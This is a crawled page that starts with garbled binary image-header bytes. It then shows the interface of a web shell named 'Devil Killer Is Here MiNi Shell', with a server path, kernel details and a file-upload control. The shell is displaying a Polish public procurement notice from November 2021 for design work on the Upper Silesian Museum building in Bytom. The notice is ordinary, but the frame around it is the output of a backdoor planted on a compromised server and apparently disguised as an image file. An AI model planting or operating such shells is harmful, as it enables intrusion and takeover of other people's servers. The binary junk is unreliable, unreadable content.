JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211105/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211105/0025991101-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Opracowanie dokumentacji projektowo-kosztorysowej dla<br/>budynku Muzeum Górnośląskiego w Bytomiu - docieplenie stropodachu,wymiana poszycia stropodachu, instalacja wentylacji mechanicznej, klimatyzacji </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MUZEUM GÓRNOŚLĄSKIE W BYTOMIU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000278451</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">pl. Jana III Sobieskiego 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bytom</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">41-902</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@muzeum.bytom.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.muzeum.bytom.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Grzegorz Galiniak prowadzący działalność pod firmą Inżynieria Śląsk</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">365724181</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">1 Maja 83</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Ruda Śląska</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">41-706</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL22A - Katowicki</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">+48 571-242-192</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">biuro@inzynieriaslask.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">www.inzynieriaslask.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Opracowanie dokumentacji projektowo-kosztorysowej dla<br/>budynku Muzeum Górnośląskiego w Bytomiu - docieplenie stropodachu,wymiana poszycia stropodachu, instalacja wentylacji mechanicznej, klimatyzacji </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-694491b5-3e5b-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00259911</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00011819/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Przygotowanie dokumentacji projektowej i technicznej do robót budowlanych polegajacych na termomodernizacji dachu oraz izloacji pionowej budynku MGB</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/muzeum_bytom <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/muzeum_bytom</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu prowadzona jest zgodnie z postanowieniami Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji<br/>oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej<br/>w postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>2. Zamawiający nie przewiduje sposobu komunikowania się z Wykonawcami w inny sposób niż przy<br/>użyciu środków komunikacji elektronicznej, wskazanych w SWZ.<br/>3. Droga porozumiewania się między Zamawiającym, a Wykonawcami:<br/>1) Postępowanie o udzielenie zamówienia prowadzi się pisemne, w języku polskim.<br/>2) Komunikacja między Zamawiającym a Wykonawcami, w tym składanie ofert, wymiana informacji<br/>oraz przekazywanie dokumentów lub oświadczeń odbywa się przy użyciu środków komunikacji<br/>elektronicznej na stronie internetowej: https://platformazakupowa.pl/pn/muzeum_bytom (zwanej dalej<br/>„platformą”).<br/>3) Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się<br/>za dokumenty złożone w terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem<br/>tego terminu. Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę<br/>ich otrzymania przez Zamawiającego.<br/>4) Korzystanie z Platformy przez Wykonawcę jest bezpłatne.<br/>5) Za datę przekazania (wpływu) oświadczeń, wniosków, zawiadomień, dokumentów lub informacji<br/>przyjmuje się datę ich przesłania za pośrednictwem platformy poprzez kliknięcie przycisku „Wyślij<br/>wiadomość”, po których pojawi się komunikat, że wiadomość została wysłana do Zamawiającego.<br/>Informacje dotyczące odpowiedzi na pytania, wyjaśnień SWZ, zmiany SWZ, zmiany terminu składania<br/>i otwarcia ofert Zamawiający będzie zamieszczał na platformie.<br/>6) Zamawiający może komunikować się z Wykonawcami za pomocą poczty elektronicznej.<br/>4. Zasady korzystania z Platformy podane są w instrukcji użytkowania pod adresem<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>5. Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego,<br/>akceptuje warunki korzystania z platformy, określone w Regulaminie zamieszczonym na stronie<br/>internetowej pod adresem https://platformazakupowa.pl/strona/1-regulamin w zakładce „Regulamin&#34;<br/>oraz uznaje go za wiążący.<br/>6. Zamawiający określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na<br/>platformie, tj.:<br/>1) stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>2) komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2<br/>GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10 4, Linux<br/>lub ich nowsze wersje;<br/>3) zainstalowana dowolna przeglądarka internetowa w najnowszej wersji, w przypadku Internet<br/>Explorer minimalnie wersja 10.0;<br/>4) włączona obsługa JavaScript;<br/>5) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików pdf.;<br/>6) zalecana objętość przesyłanych danych, tj. plików o wielkości maksymalnej do 50 MB;<br/>7) zalecany format plików .pdf.<br/>7. Zasady komunikowania się Wykonawców z Zamawiającym:<br/>Wykonawcy komunikują się z Zamawiającym za pośrednictwem platformy - za datę przekazania<br/>(wpływu) oświadczeń, wniosków, zawiadomień, dokumentów lub informacji przyjmuje się datę ich<br/>przesłania za pośrednictwem platformy poprzez kliknięcie przycisku „Wyślij wiadomość”, po których<br/>pojawi się komunikat, że wiadomość została wysłana do Zamawiającego.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1) posiada statut administratora danych osobowych w stosunku do:<br/>a) Wykonawcy będącego osobą fizyczną,<br/>b) Wykonawcy będącego osobą fizyczną, prowadzącą jednoosobową działalność gospodarczą<br/>pełnomocnika Wykonawcy będącego osobą fizyczną (np. dane osobowe zamieszczone w<br/>pełnomocnictwie),<br/>c) członka organu zarządzającego Wykonawcy, będącego osobą fizyczną (np. dane osobowe<br/>dostępne w Krajowym Rejestrze Sądowym),<br/>dalej łącznie „Pani/Pana”;<br/>2) administratorem Pani/Pana danych osobowych jest Muzeum Górnośląskie w Bytomiu, pl. Jana III<br/>Sobieskiego 2, 41-902 Bytom, tel.: + 48 (32) 281 82 94, e-mail: sekretaiat@muzeum.bytom.pl;<br/>3) w związku z przetwarzaniem danych osobowych można kontaktować się z Inspektorem Ochrony<br/>Danych: iod@muzeum.bytom.pl;<br/>4) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie niniejszego zamówienia publicznego prowadzonym w trybie<br/>podstawowym o którym mowa w art. 275 pkt 1) ustawy Pzp;<br/>5) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp;<br/>6) podmiotem przetwarzającym dane jest platformazakupowa.pl, Open Nexus Sp. z o.o. Bolesława<br/>Krzywoustego 3, 61-144 Poznań oraz podmioty które zostały upoważnione przez administratora.<br/>7) dane osobowe będą przechowywane, przez okres 5 lat licząc od początku roku następnego po<br/>udzieleniu zamówienia, a w przypadku zawarcia umowy do momentu wygaśnięcia roszczeń<br/>wynikających z umowy, jak również wykonania obowiązków wynikających z przepisów prawa, nie<br/>krócej niż 10 lat licząc od początku roku następnego po zawarciu umowy, w tym w szczególności<br/>podatkowych i rachunkowych;<br/>8) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp;<br/>9) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO;<br/>10) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących*,<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych**,<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO***,<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pana,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1) nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych,<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO,<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">TP-U/6/2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest Opracowanie dokumentacji projektowo-kosztorysowej dla<br/>budynku Muzeum Górnośląskiego w Bytomiu w ramach realizacji zadania pn.<br/>„Termomodernizacja budynku przy pl. Jana III Sobieskiego 2 wraz z podniesieniem<br/>bezpieczeństwa p.poż”<br/>Zamówienie obejmuje wykonanie kompleksowej dokumentacji technicznej obejmującej<br/>wykonanie docieplenia stropodachu, likwidacji naświetli dachowych oraz zabudowy systemu<br/>wentylacji mechanicznej i klimatyzacji w wybranych pomieszczeniach poddasza. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-10-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">doświadczenie projektanta (projektantów) skierowanych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki<br/>udziału w postępowaniu:<br/>1. W zakresie zdolności do występowania w obrocie gospodarczym – Zamawiający nie określa<br/>szczególnego warunku w tym zakresie.<br/>2. W zakresie uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o<br/>ile wynika to z odrębnych przepisów – Zamawiający nie określa szczególnego warunku w tym<br/>zakresie.<br/>3. W zakresie sytuacji ekonomicznej lub finansowej – Zamawiający nie określa szczególnego<br/>warunku w tym zakresie.<br/>4. W zakresie zdolności technicznej lub zawodowej.<br/>1) Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3<br/>lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym czasie, wykonał (a w przypadku<br/>świadczeń powtarzających się lub ciągłych również wykonuje):<br/>a) co najmniej jedną usługę polegającą na wykonaniu dokumentacji projektowo-kosztorysowej<br/>obejmującej ocieplenie dachu<br/>2) Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że do wykonania<br/>przedmiotowego zamówienia skieruje osoby zdolne do realizacji przedmiotowego zamówienia<br/>posiadające odpowiednie doświadczenie oraz kwalifikacje zawodowe umożliwiające realizację<br/>zamówienia:<br/>a) 1 osoba albo osoby posiadające uprawnienia budowlane w specjalności architektonicznej bez<br/>ograniczeń uprawniające do projektowania w odniesieniu do architektury obiektu oraz<br/>uprawnieniami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń<br/>uprawniającymi do projektowania konstrukcji obiektu a także uprawnieniami budowlanymi bez<br/>ograniczeń do projektowania w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>wodociągowych i kanalizacyjnych oraz Uprawnienia do projektowania w specjalności<br/>instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez<br/>ograniczeń (Zamawiający dopuszcza, aby jedna osoba legitymowała się oboma rodzajami<br/>wymaganych uprawnień, albo dwie lub więcej osób posiadały łącznie wymagane uprawnienia).<br/>Wymagane uprawnienia do projektowania powinny być nadane na podstawie przepisów<br/>rozporządzenia Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie<br/>przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w<br/>budownictwie (Dz. U. z 2019 r., poz. 831) lub przepisów odpowiadających, obowiązujących w<br/>czasie uzyskiwania uprawnień.<br/>Wszystkie osoby, które nabyły kwalifikacje zawodowe w innych niż Rzeczpospolita Polska<br/>państwach członkowskich Unii Europejskiej, Państwach członkowskich Europejskiego<br/>Porozumienia o Wolnym Handlu (EFTA) - stronach umowy o Europejskim Obszarze<br/>Gospodarczym, Konfederacji Szwajcarskiej, i które wykonawca wskaże do uczestniczenia w<br/>wykonaniu niniejszego zamówienia i od których wymagane są uprawnienia budowlane, winny<br/>posiadać decyzję w sprawie uznania wymaganych kwalifikacji do wykonywania w<br/>Rzeczypospolitej Polskiej funkcji technicznych w budownictwie w zakresie przedmiotu<br/>niniejszego zamówienia zgodnie z ustawą z 22 grudnia 2015 r. o zasadach uznania kwalifikacji<br/>zawodowych nabytych w krajach członkowskich Unii Europejskiej (tekst jedn.: Dz. U. z 2021 r.<br/>poz. 2272 ze zm.) lub poprzednio obowiązującej ustawy z dnia 18 marca 2008 r. o zasadach<br/>uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenia Wykonawcy o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału ważne na dzień składania ofert</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">• składane wraz z ofertą:<br/>1) Oświadczenia Wykonawcy o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału ważne<br/>na dzień składania ofert;<br/>W przypadku wspólnego ubiegania się o zamówienie oświadczenia składa każdy z Wykonawców<br/>ubiegających się wspólnie o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz<br/>spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji.<br/>Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających<br/>zasoby, przedstawia także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak<br/>podstaw wykluczenia tego podmiotu oraz spełnianie warunków udziału w postępowaniu, w zakresie<br/>jakim Wykonawca powołuje się na jego zasoby.<br/>W przypadku gdy Wykonawca polega na zdolnościach lub sytuacji innych podmiotów udostępniających<br/>zasoby składa, wraz z ofertą, zobowiązanie podmiotu udostępniającego zasoby do oddania mu do<br/>dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy<br/>środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował<br/>niezbędnymi zasobami tych podmiotów.<br/>2) Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym<br/>okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi<br/>zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały<br/>wykonane lub są wykonywane należycie, przy czym dowodami, o których 